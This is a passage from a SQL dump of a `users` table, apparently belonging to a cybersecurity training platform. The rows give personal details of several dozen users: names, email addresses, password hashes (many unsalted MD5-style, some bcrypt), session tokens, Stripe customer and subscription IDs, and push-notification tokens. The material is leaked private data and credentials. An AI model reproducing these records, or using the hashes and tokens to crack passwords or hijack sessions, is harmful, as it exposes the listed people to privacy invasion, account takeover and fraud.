(151, NULL, 'Ansh', 'mandaniansh2323@gmail.com', '294a7b79eee43097e927a1615d3e1016', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 22:16:08', 'mandaniansh2323c721af', 'Mandani', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 19:16:08', NULL, 1, 0, NULL, 'e3c014e246141c74838c4323ee2811eb1426ec0a33dea3bccea55f47eac30c8c', NULL, NULL, NULL, 'ExponentPushToken[LtDa8dADDvm_lRKWbTgfQO]', NULL, 0, NULL, 'web', 0, 1, 0),
(152, NULL, 'Mr', 'biyofalcon@gmail.com', 'f8db0cf14cf75794226b383215d09aad', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 04:20:19', 'biyofalcon30dac4', 'Falcon', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 01:20:19', NULL, 1, 0, NULL, '7d6fc91c0c1e646b94dcebf40a244fb3dbad06c796afde4d30ed651090b0e999', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(153, NULL, 'Thulani ', 'Manzakhevico@gmail.com', '$2a$10$URGmNrY9dlhpVh0kYcMQ1.ZslJ8nCtMWdeXxUKnxbqZtMdgX.qtV6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 04:37:03', 'VicoT', 'Cele', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 01:37:03', NULL, 1, 0, NULL, '0f00b6d90ee834578316a71cb4f89224948840047f5d437ac8364abf19fc5a3d', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(154, NULL, 'Night', 'Nighthf3@gmail.com', '$2a$10$Lmjj4Q6k7eLoitCLAs4hHe85aM/rbFQLaBtGnYrVnKSldhfiUyqxC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 06:39:54', 'Nighthf', 'Hf', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 03:39:54', NULL, 1, 0, NULL, 'f95c18627afc822abce17a66a92472ef79db7e0a29bdc2650496e963281dbbb5', 'f437032c5a1656defa391e09b4356a5396632ab187f7101370c421f49c65143e', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(155, NULL, 'Sohail', 'ilaliahos098765@gmail.com', '478c6b43e43a4d6e352f6730fd663261', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 14:06:24', 'ilaliahos098765075d4a', 'Ali', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 11:06:24', NULL, 1, 0, NULL, '1a15b55aac74ecb8cdab6d10d76681fad23cd68ecf486f450b6cf8c27cb5add7', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0);
INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `mobile_session_token`, `primary_path`, `secondary_path`, `expo_push_token`, `banner_url`, `is_student`, `organization_id`, `registration_source`, `verification_reminder_sent`, `is_subscribed_newsletter`, `first_push_sent`) VALUES
(156, NULL, 'Arven', 'ravencyber888@gmail.com', '7e8d1c0b15019ca1a48a7e211c9ded12', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 23:43:33', 'ravencyber8882e2be2', 'Saromines', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 20:43:33', NULL, 1, 0, NULL, '5b45e5068a3000f375a96ef0ffb530b0b847fc5ec7541588990f00968f3e1178', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(157, NULL, 'Juan Manuel', 'juanmanuel.sanz.gonz@gmail.com', 'eaa0708cd328498e1a1b6a970e26f15f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 00:26:25', 'juanmanuel.sanz.gonz7cf9a9', 'Sánchez González', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 21:26:25', NULL, 1, 0, NULL, 'b8159054ca81bd467f15a6732720ee07043a92e439d01df7e312695140c34793', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(158, NULL, 'Stalin', 'stalin43@hotmail.com', '$2a$10$n0dhjkfIQ527V5d1NY6DDujK67r.epEKkwpdLDDbtqRPuUNM928Ji', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 02:19:10', 'stalin43', 'Garcia ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 23:19:10', NULL, 1, 0, NULL, '485162de10735a1a9dd3f9bcb86f230311a17b23057504f7049a1f87f05a6672', '54135412aeac14c9446bb8e80e4497ce4410fa609004de5a33054cc0e1017928', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(159, NULL, 'Kandice', 'turnerkm78@gmail.com', '062c150dd65dce231bb081a0567b0e58', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-16 02:22:18', 'turnerkm781dbd02', 'Turner', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 23:22:18', NULL, 1, 0, NULL, 'e0e26ed85f75e4ad69259db21cfc293aebd4e65e4fb3c795ab130c2c4bfaaee9', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(160, NULL, 'Xabi', 'xabihomelab@gmail.com', '4428a9790341744d493ce1de7bdb2379', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 02:40:38', 'xabihomelabbc57d0', 'Homelab', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 23:40:38', NULL, 1, 0, NULL, 'bc17a55d66751ed000eb2874e3ad67f1e0b7c407ba3f6a2c2f411e594b1b24a6', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(162, NULL, 'Chetan', 'rchetan941@gmail.com', '46a95a72a7014711cbf61de7355c190d', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 15:06:12', 'rchetan941d2edc0', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 12:06:12', NULL, 1, 0, NULL, '1da66f6d85c524cd38808a4435f8e024a0f8f9352620badf897f8d15a6aac159', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(163, NULL, 'L', 'kimchi.tiger@gmail.com', 'f9eafa0915b52448ade084bed8461ce9', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 15:22:16', 'kimchi.tigerda4536', 'H', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 12:22:16', NULL, 1, 0, NULL, '8de6846a351d6482d385874563b1d5b97a1042dda1a4bb34286b7feb54e67bec', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(164, NULL, 'Recep', 'recepcybersec@gmail.com', 'd3a332c176f5533be8d5e4bf54711140', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 17:54:11', 'recepcybersec796dcd', 'Guner CISSP CCNA', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 14:54:11', NULL, 1, 0, NULL, 'fb0ec88dbcf36fab55133440e67656145c5708e3cf99c0bef8fff31fbe7d4f0f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(165, NULL, 'Pranith', 'pranithjainbp84@gmail.com', 'ac9a7c91d62841b5ee6b350b461371b3', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-16 20:14:50', 'pranithjainbp84dcaa20', 'Jain', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 17:14:50', NULL, 1, 0, NULL, '4f8430a31a841015f221977e667824a22f8d6b0913f0e2140dbf57e359e9b9d7', NULL, 'TI', 'DLP', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(166, NULL, 'Gregory', 'gregorypatterson2255@gmail.com', 'dc9a6dd3a2f06d30a346ccb8232260de', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-17 18:29:04', 'gregorypatterson2255db67cd', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-17 15:29:04', NULL, 1, 0, NULL, 'e503cd9501f7932ac1cf57e6bf00c5e88d1593d98d43f211d20651699209a0fb', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(168, NULL, 'Preetam', 'duttapreetam892@gmail.com', 'bd662ec1c075ba77c7b9df4d3d285246', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 09:47:45', 'duttapreetam892781895', 'Dutta', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 06:47:45', NULL, 1, 0, NULL, '090f02429a60b71c9040a29121bbaaef1bfb3eec37ba84c061c383a63a058cd0', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(169, NULL, 'Hesham', 'hobide32@hotmail.com', '$2a$10$t/VGQhz0ol2v.mL0xqe1A.t/vbxIs7oBSokG6muTTf/cZzKSGZHOy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 10:15:42', 'BigBoss', 'Obied', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 07:15:42', NULL, 1, 0, NULL, '0da1fa3c817be931ba3bad78f9d737b3fbe4d05e36a55d84b85636d34674aea5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(170, NULL, 'BROTHER', 'yoviso3371@fentaoba.com', '$2a$10$KxSIvnqv8mEF0reWdxPfNeqPuJ5lgcvOL30fuLd9jVB6LTnZUW4wi', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 11:18:30', 'BROTHERHOOD ', 'HOOD ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 08:18:30', NULL, 1, 0, NULL, 'f1e91684fad1587e19c7c810a45901e7b8cd8fe7b1094472e3e0206cbae50803', 'd5fca9317b3d8b941e2e217c953949ce493d12cb6dc14f252661fd0c9e1665b4', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(171, NULL, 'Hakan', 'hakanonay01@gmail.com', '$2a$10$tZ9hckMJotgNxAFk4nQp3.u.4XuLqS1HFa5RMvAe86/g8jrq/X.sq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 12:48:53', 'Hakan', 'Hakan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 09:48:53', NULL, 1, 0, NULL, '7b5dec3dce07a4a715376ccd1400701ace4b668e67bf81f385336d15b1fee18b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(172, NULL, 'NIKHIL', 'nikhilmurali004@gmail.com', '2d13114b5a47e2dd0f13e719a7f79e13', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 14:05:56', 'nikhilmurali0045ee554', 'MURALI', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 11:05:56', NULL, 1, 0, NULL, '4a9f498bf9ed959edf405e4207f5c8ecee1cf3a091ea1c01bb3283102ee75f6b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(173, NULL, 'Karibou', 'infoseclabs.v29ct@8shield.net', '$2a$10$s.UmqUWFYqE9FQTNlvPKAuKWsH7UfT8pPNU0c3jmOutdNAMw6pvue', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 15:12:56', 'Karibou', 'Ulu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 12:12:56', NULL, 1, 0, NULL, '936258fc26d77fcd1f751cd7f6629b3cbdb01f04446331e0ac0ecb9a8012ad95', '8d22384638f886289111b4c7fbc834ce61802ca70054434d8c9563c8ba1b28b9', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(174, NULL, 'Shannon', 'srking0820@gmail.com', 'f6cc81ef7f629aba4ef5bf7d649ed808', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-18 18:07:07', 'srking08208318fe', 'King', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 15:07:07', NULL, 1, 0, NULL, 'a2b39c610b82cc5416e3fbfc6fbcea069d20cfecf67a68980d0ea82335f41618', '528a9754e10a8ab7b5f96a2dae888a61626d55f6ea9743ec772bd8ac7711cf4c', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(175, NULL, 'stacey', 'ncitstl@gmail.com', 'ee99be90ed39ec8a6a61ede7a67229f2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 18:40:00', 'ncitstl70b5fb', 'lucas', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 15:40:00', NULL, 1, 0, NULL, 'e6a984f546d001313f28435bfac67966e1d212e6cf555e85afffd5b514ca2180', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(176, NULL, 'anis', 'anisrotio@gmail.com', '91f03f36a71f3ab309d0e1a8358b346b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-19 06:47:10', 'anisrotio760c0c', 'abbas', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 03:47:10', NULL, 1, 0, NULL, '5a1c2a585f946617c827a54f66a3c88e9112a39a80fbda050de3b6cae0484895', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(177, NULL, 'Abhishek', 'abhisheknayak0440@gmail.com', '4059c82c5075bc631d99e15e038791c6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-19 07:01:42', 'abhisheknayak0440a63467', 'Nayak', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 04:01:42', NULL, 1, 0, NULL, '6900349fd2bab3498dc13cb3fb22b244a4da5d15e6d9f013e8fdedae8d9b215b', '9f881ee67f41e3e9eade2d077f5fa269c0f66acc775429e7a11f49742dceabfa', 'SIEM', 'EDR', 'ExponentPushToken[_QnaaJGz1UOXdhiA8e6aiP]', NULL, 0, NULL, 'web', 0, 1, 0),
(178, NULL, 'Akhmad', 'akukausar@hotmail.com', '06cc3e5c1672c3ee988ae89a820cfe7c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-03 11:41:33', 'akukausarbe12b6', 'Kautsar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 05:19:11', NULL, 1, 0, NULL, 'c6d6bbdd38a07a3235040a53edf959e346eacd809a7748a983e97e1aaeeab3f0', NULL, 'SIEM', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(179, NULL, 'Tushar', 'tusharahire7000@gmail.com', '3ede145b30ca879398b7c3422f4d3db5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-19 15:58:33', 'tusharahire70005dfc03', 'Ahire', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 12:58:33', NULL, 1, 0, NULL, 'ce6135738c752572c86509326f842e35a0e87235e861cd76266a08bf285493c9', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(180, NULL, 'Yogesh', 'warany204gesh@gmail.com', '$2a$10$nt0Vfi1VBN36gaptEglUqeKEa/4GBKvfMW.IQb4wD27xdprwQIehy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-19 18:44:04', 'warany204gesh3de92c', 'Waran', 1, NULL, NULL, NULL, 3, '2026-03-09 11:59:36', NULL, '2026-02-19 15:44:04', NULL, 1, 0, NULL, 'fc4e74364b8c8f8ae2769ae2e2e7f8b754b2d38d3abb9fdffd915a7f3351a7f0', 'c0d7452fd8c54ce3e13beb3da87a7eb2f128fe0e89b64344246dfd5e9b7ec348', NULL, NULL, 'ExponentPushToken[i_FyFOHIPsLlkUgnG96WxK]', NULL, 0, NULL, 'web', 0, 1, 0),
(181, NULL, 'Anita', 'anita.yankson89@gmail.com', '$2a$10$bz9f2MR8SzI/tB0bk.4Epe0dXwKWx.fVWTKEe7BYpEtr6yk4g/aXu', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 05:32:46', 'Anny', 'Yankson ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 02:32:46', NULL, 1, 0, NULL, '46c0e1def6eb19b162183b4a0366ccd66fcff82d65493fd19a85a55e316c15aa', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(182, NULL, 'Apple', 'Apple@infoseclabs.io', '$2a$10$55hQrlLU11WqBZy3Uako0OoyTR4a1HBWbWT3kQJQSuOcE8enT6VOm', 'normal', NULL, 'pro', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 06:10:13', 'Apple', 'Lover', 1, '50c67b472c3970b3e093d1f0e927626e7947fa187a3ef1dd25481389b7f6a710', NULL, NULL, 0, NULL, NULL, '2026-02-20 03:10:13', NULL, 1, 0, NULL, '0852681ab81cdbe473a29570cf7e37848ea6e37db7b5441a360230186b79c819', '9b56f4ea457458ed5a5583b1ded05a5c5a16e940f6602a0674a2f0685b32ae83', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(183, NULL, 'Chetan', 'cstpm5055@gmail.com', '8f48aeae7c699cf2409f9fc1e6a8ef40', 'pro', NULL, 'monthly', 'active', 'sub_1T2l74L5VKtXn66brujAYOq2', 'cus_U0mgzsSoEysb3M', 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 06:54:43', 'cstpm50556f2811', 'CS', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 03:54:43', NULL, 1, 0, NULL, 'dadf3dc876a1b6da9faac335fcf5c518245eeaa615bbfbbfcaa3c3f8672b346b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(184, NULL, 'Khadir', 'kmanjoor27@gmail.com', 'd4c24705f667869d66989795ad539d12', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 10:52:51', 'kmanjoor272fe0ba', 'Manjoor', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 07:52:51', NULL, 1, 0, NULL, '27e1c140208f6b6ec5c3b486b60515e3e78ebfc4038f6eac5e48b74d32edd3ad', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(185, NULL, 'Ryan', 'daydaymichaelryan@gmail.com', 'dd331efc3c90f7f98ff96069a054cf7b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-20 11:58:17', 'daydaymichaelryanc60a53', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 08:58:17', NULL, 1, 0, NULL, 'e4c38a6c31ddc07667a7755c72e762c7129f31f83d0a663c940acfd204a75024', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(186, NULL, 'SanketCyber', 'sanketcyber58@gmail.com', '283beea60bc41bb007549e5283fccc4a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 19:30:37', 'sanketcyber58b7b6a0', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 16:30:37', NULL, 1, 0, NULL, 'c13d204fe0e71c559fb86c0dab944bb967730984e5ad00a141f360fdd92b0f64', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(187, NULL, 'Jithin', 'jithuahalya@gmail.com', 'bb4c18c907223fe657c9a9434601d658', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-15 06:16:15', 'jithuahalya36fc12', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-21 03:05:53', NULL, 1, 0, NULL, '6a74a2f5878e92571667e0beb38110ca06c0ae49056f22d9e0e0e5c7abb73c02', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(188, NULL, 'Digvijay', 'dvsingh335@gmail.com', '89f6542e94500ebc3ae822dbd5a52dcb', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-21 18:36:57', 'dvsingh335fc9841', 'Singh', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-21 15:36:57', NULL, 1, 0, NULL, '1d25db757a39f2122e954ac9f90d44b1a2d03b15ec5832cf5d6f061ec6f5aed4', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(189, NULL, 'Amadou', 'ame.cyberops12@gmail.com', '$2a$10$I86CVmzQTSB9Y.r8a3/NnetTiHfbfNpdpv9VS4PMsyu7igcs02zG2', 'pro', '/uploads/189-1771703452023.jpeg', 'yearly', 'active', 'sub_1T3NIiL5VKtXn66bIU5VlBZv', 'cus_U1Q7lRwbBVd0Z8', 0, NULL, NULL, NULL, NULL, 1, '2026-02-21 21:33:55', 'Longshadow', 'Mane', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-21 18:33:55', NULL, 1, 0, NULL, '215b9cffd52149cec3fd21922fe9147e84267feec4b07ed83ccab4d3626914e0', '7dbf751049b2fd5c13401b2945e260259503b245ae163c7291b0c3e57bf351c2', 'SIEM', 'EDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(191, NULL, 'Sabrina', 'sabcybersectraining@gmail.com', '698e561f3b4df6ec2b467b7f071b0b3a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-22 04:39:29', 'sabcybersectraining83875d', 'Pegado', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-22 01:39:29', NULL, 1, 0, NULL, '12bf8c7b9dce7839225bd89b3d93d33960b598de948e3b3787efc51c8a8be4c3', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(192, NULL, 'Ganesh', 'ganeshyadav9805@gmail.com', 'dffcfa875a78624a8a34cc013fc0d39f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-22 11:26:25', 'ganeshyadav9805e8a294', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-22 08:26:25', NULL, 1, 0, NULL, '93941775ddf363cd27d0486836c4bbec588164430f235636ad210b829da21118', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(193, NULL, 'Robin', 'robinsocjourney@gmail.com', '9fe3f46873421719b2f179784cb38547', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-22 21:24:05', 'robinsocjourneyd110fe', 'Almqvist', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-22 18:24:05', NULL, 1, 0, NULL, '9fcd5b140b9ce81cc35e64461fb466b32722dcefc080322d475f91b91b52d953', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(194, NULL, 'AbdelRahman', 'abdelrahman2105137@miuegypt.edu.eg', 'f88f9bc006e2f8d355448a484044bf9c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-23 06:17:17', 'abdelrahman210513718b7d5', 'Abdel Rahman Mohamed Aly Shahy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-23 03:17:17', NULL, 1, 0, NULL, NULL, '68581f23f8f7be713077767642250ffbbc127341eb9639bb452d870c55bec0b4', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(195, NULL, 'Cyrus', 'c.abrahimy@gmail.com', 'cf7bb683401281c6c8cd4417a62f29b1', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-05 10:53:20', 'c.abrahimy0ef87e', 'Ebrahimy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-23 16:00:42', NULL, 1, 0, NULL, '1cc8de39be6c81ab47d7b80b19bd5722d5b15b2af7ce1a78a332abc13fc437f8', '0cc3a812e1ee74da2ffea20f2b2a528922c6a51b75401b56d7a1c1b4d836437e', 'SIEM', 'NDR', NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(196, NULL, 'Santos,', 'jaygabriel.santos15@gmail.com', 'a981881b5f7d5637aa29aadfce112a99', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-23 20:35:00', 'jaygabriel.santos158e2bd5', 'Jay Gabriel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-23 17:35:00', NULL, 1, 0, NULL, '873a1b00b48440a5620c1cfcd1c64441eabb9d1971bc2167fd93e331b580159b', '1549833103bc90a5612204973ea09c53aa78cf525975168cb896cfb9ee54fda3', 'SIEM', NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(197, NULL, 'pawan', 'pawanp3300@gmail.com', '0cc0185642ef578d2d138400d0f8bf91', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-23 21:53:21', 'pawanp3300b47b7d', 'Pandey', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-23 18:53:21', NULL, 1, 0, NULL, NULL, '43ffc22b5f90a7c2784fa4de52aa042d1bf5164ee1293491e421a1f3de431a74', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(198, NULL, 'The', 'danielssnchez123@gmail.com', '96668056e305e8a495df5d209be1bdbb', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-24 02:51:02', 'danielssnchez123d31387', 'Aborphan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-23 23:51:02', NULL, 1, 0, NULL, '22c48f924b31e23e3b83156b0fabb6677fd4ea4179aa8d875f73090181019c23', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(199, NULL, 'Daniel', 'danielsanchez8097@gmail.com', 'f66b7026b1179114aadbf9f77bd813a5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-24 02:52:04', 'danielsanchez8097997918', 'Sanchez', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-23 23:52:04', NULL, 1, 0, NULL, 'c42f384f4039388c92775d7552065bb3a8eb05482134fcc865f0535c041063f0', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(200, NULL, 'Leandro', 'leandro.espinoza.robles@ciisa.cl', '$2a$10$RCKm5wHFvuA7liE7MAjwvecf6Xlv6paq0qKroDUfRFli2XX9dGDDS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-24 06:27:33', 'Drolean', 'Espinoza', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-24 03:27:33', NULL, 1, 0, NULL, '39840c29801b3ac5b746609388e1b7cfa589928b61d85e14ea36314b5a3e75ad', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(201, NULL, 'Tim', 'tau.timnedry.1713451036499@gmail.com', '2a3ecccdf978dc8bedc8f614a382e49c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-24 10:41:32', 'tau.timnedry.1713451036499f46466', 'Nedry', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-24 07:41:32', NULL, 1, 0, NULL, NULL, 'c30262f9d2ecb32832b43233da67ba42bc2f6add545e6739112c6ddb5fedca5c', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(202, NULL, 'Joaquin', 'jzarcom.22@gmail.com', 'a924d0c0dc6aa88d3722d1c754f1292c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-24 18:31:22', 'jzarcom.22d3ade0', 'Zarco M', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-24 15:31:22', NULL, 1, 0, NULL, NULL, '26782031f1a0c59a736c8c7cf18bc1349f6f9113b9547d1627cc61f1bdf1eff2', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
